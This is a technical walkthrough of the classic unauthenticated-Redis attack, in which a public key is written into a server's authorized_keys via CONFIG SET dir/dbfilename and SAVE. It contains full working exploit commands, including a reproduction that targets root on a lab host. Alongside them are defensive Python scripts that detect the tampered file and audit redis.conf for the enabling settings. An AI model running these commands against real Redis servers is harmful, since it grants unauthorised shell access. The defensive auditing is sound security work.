```
$ telnet 192.168.1.11 6379
Trying 192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.
```
```
$ ssh-keygen -t rsa -C "[email protected]"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/antirez/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:27 [email protected]
The key's randomart image is:
+--[ RSA 2048]----+
|            . O+.|
|       . o o..o*o|
|      = . + .+ . |
|       o B o .   |
|      . o S E .  |
|       . o       |
|                 |
|                 |
|                 |
+-----------------+
```
```
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
```
Now foo.txt is just our public key but with newlines. We can write this string inside the memory of Redis using redis-cli:
```
$ redis-cli -h 192.168.1.11 flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
```
Looks good. How to dump our memory content into the authorized_keys file? That’s
```
$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK
```
At this point the target authorized_keys file should be full of garbage, but it should also include our public key. The string does not have simple patterns, so it's unlikely that it was compressed inside the RDB file. Will ssh be naive enough to parse a totally corrupted file without issues, and accept the only sane entry inside?
```
$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Last login: Mon Nov  2 15:58:43 2015 from 192.168.1.10
~ ➤ hostname
Salvatores-MacBook-Air.local
```
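The answer above is yes: sshd skips lines it cannot parse and honours the one well-formed key. That tolerance is also what a defender can check for. The following Python is an added example, not code from the original post: it audits an authorized_keys file for the exact damage described, an RDB header at the start of the file, lines that are not parseable public keys, and the one valid key that sshd would still accept. The sample bytes, the RSA parameters and the key comment are constructed for the demo, and the RDB layout is simplified to the header, one string key and the EOF marker.

```python
import base64
import struct

# Key types sshd accepts in authorized_keys (a subset, enough for this check).
KNOWN_KEY_TYPES = {b"ssh-rsa", b"ssh-ed25519", b"ecdsa-sha2-nistp256",
                   b"ecdsa-sha2-nistp384", b"ecdsa-sha2-nistp521"}
RDB_MAGIC = b"REDIS"  # every RDB dump starts with "REDIS" + a 4-digit version


def ssh_string(b):
    """RFC 4251 string: uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def build_rsa_pubkey_line(e, n, comment):
    """Build an OpenSSH 'ssh-rsa <base64> <comment>' line from RSA parameters.
    Constructed demo input only: the n used below is not a real modulus."""
    def mpint(x):
        # RFC 4251 mpint is two's complement, so a positive value whose high bit
        # is set needs a leading zero byte; (bit_length + 8) // 8 adds exactly that.
        return ssh_string(x.to_bytes((x.bit_length() + 8) // 8, "big"))
    blob = ssh_string(b"ssh-rsa") + mpint(e) + mpint(n)
    return b"ssh-rsa " + base64.b64encode(blob) + b" " + comment.encode()


def parse_key_line(line):
    """Return the key type (str) if line is a well-formed public key, else None.
    Key options such as command="..." in front of the type are not handled."""
    parts = line.split()
    if len(parts) < 2 or parts[0] not in KNOWN_KEY_TYPES:
        return None
    try:
        blob = base64.b64decode(parts[1], validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(blob) < 4:
        return None
    (tlen,) = struct.unpack(">I", blob[:4])
    # The binary blob must start with its own type string, matching the text field.
    if blob[4:4 + tlen] != parts[0]:
        return None
    return parts[0].decode()


def audit_authorized_keys(data):
    """Classify every non-empty, non-comment line of an authorized_keys file."""
    report = {"rdb_magic": data.startswith(RDB_MAGIC),
              "valid_keys": [], "garbage_lines": 0}
    for raw in data.split(b"\n"):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        ktype = parse_key_line(line)
        if ktype:
            report["valid_keys"].append(ktype)
        else:
            report["garbage_lines"] += 1
    # A file sshd still accepts but that contains non-key bytes is the tell.
    report["suspicious"] = report["rdb_magic"] or report["garbage_lines"] > 0
    return report


# --- Constructed sample: what authorized_keys looks like after the dump above
#     (simplified RDB: header, SELECTDB, one string key, EOF, 8-byte checksum).
def rdb_len(n):
    """RDB length prefix for 64 <= n < 16384 (the 14-bit form)."""
    return bytes([0x40 | (n >> 8), n & 0xFF])


PLANTED_KEY = build_rsa_pubkey_line(
    65537, int.from_bytes(b"constructed-modulus-not-a-real-key", "big"),
    "constructed@example")
VALUE = b"\n\n" + PLANTED_KEY + b"\n\n"   # the "newline-padded" payload from foo.txt
SAMPLE_DUMP = (b"REDIS0006"              # magic + version
               + b"\xfe\x00"             # SELECTDB 0
               + b"\x00"                 # value type: string
               + b"\x07crackit"          # key name
               + rdb_len(len(VALUE)) + VALUE
               + b"\xff" + b"\x00" * 8)  # EOF + checksum (all zeros = checksum disabled)

if __name__ == "__main__":
    print(audit_authorized_keys(SAMPLE_DUMP))
```

Run against the constructed dump it reports the RDB magic, two garbage lines (the RDB header and the EOF/checksum tail) and a single valid ssh-rsa key; a file that holds only properly formatted keys is reported as not suspicious. The same check is cheap to schedule over every user's authorized_keys on hosts that also run a data store.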
### Test environment

```
victim server CentOS6.6+redis2.4 192.168.192.133
attack server CentOS6.6 192.168.192.132
```

First generate a key pair on the attack server (save the key as ./redis when prompted, so that redis.pub is the file read below):

```
ssh-keygen -t rsa -C "redis"
(echo -e "\n\n"; cat redis.pub; echo -e "\n\n") > redis.txt
```

Then run:

```
redis-cli -h 192.168.192.133 flushall
cat redis.txt | redis-cli -h 192.168.192.133 -x set pwn
```

Connect to redis and change its configuration:

```
redis-cli -h 192.168.192.133
CONFIG set dir /root/.ssh/
config set dbfilename "authorized_keys"
save
exit
```

The SSH key can then be used to log in (`-i` takes the private key, saved as ./redis, not redis.pub):

```
ssh -i redis [email protected]
```
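Both the original walkthrough and this reproduction rely on the same three conditions: the Redis port is reachable from another host, no password is required, and CONFIG is still available so `dir` and `dbfilename` can be changed at runtime. As an added example (not from the original post or this reproduction), the following Python checks a redis.conf for those conditions. The two configurations are constructed samples; the protected-mode check only applies to Redis 3.2 and later, where that directive exists, and is skipped when the directive is absent.

```python
import shlex


def parse_redis_conf(text):
    """Parse redis.conf into {directive: [argument lists, in file order]}.
    Redis applies directives in order, so the audit looks at the last occurrence."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted values such as requirepass "a b"
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return one finding per setting that makes the authorized_keys trick possible."""
    conf = parse_redis_conf(text)
    findings = []

    def last(directive):
        values = conf.get(directive)
        return values[-1] if values else None

    pw = last("requirepass")
    if not pw or not pw[0]:
        findings.append("requirepass unset: anyone who can reach the port can run commands")

    bind = last("bind")
    if bind is None or any(a in ("0.0.0.0", "*", "::") for a in bind):
        findings.append("bind missing or wildcard: Redis listens on every interface")

    pm = last("protected-mode")  # Redis 3.2+; older versions have no such directive
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients are not refused")

    # rename-command CONFIG "" disables the command; renaming it to a secret name hides it.
    renamed = {a[0].upper(): a[1] for a in conf.get("rename-command", []) if len(a) == 2}
    if renamed.get("CONFIG") in (None, "CONFIG"):
        findings.append("CONFIG not renamed or disabled: dir/dbfilename can be changed by any client")

    return findings


# Constructed sample: the out-of-the-box posture the two sessions above relied on.
WEAK_CONF = """
# constructed example, not a real deployment
port 6379
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
"""

# Constructed sample: the same instance with the page's attack path closed.
HARDENED_CONF = """
port 6379
bind 127.0.0.1
protected-mode yes
requirepass "long-random-secret-CHANGEME"
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or ["no findings"])
```

The weak configuration produces four findings, the hardened one none. Note that a password and a renamed CONFIG address the two halves of the trick independently: the password stops the unauthenticated `set` and `save`, while disabling CONFIG stops a client that does have access from pointing the dump at an arbitrary path.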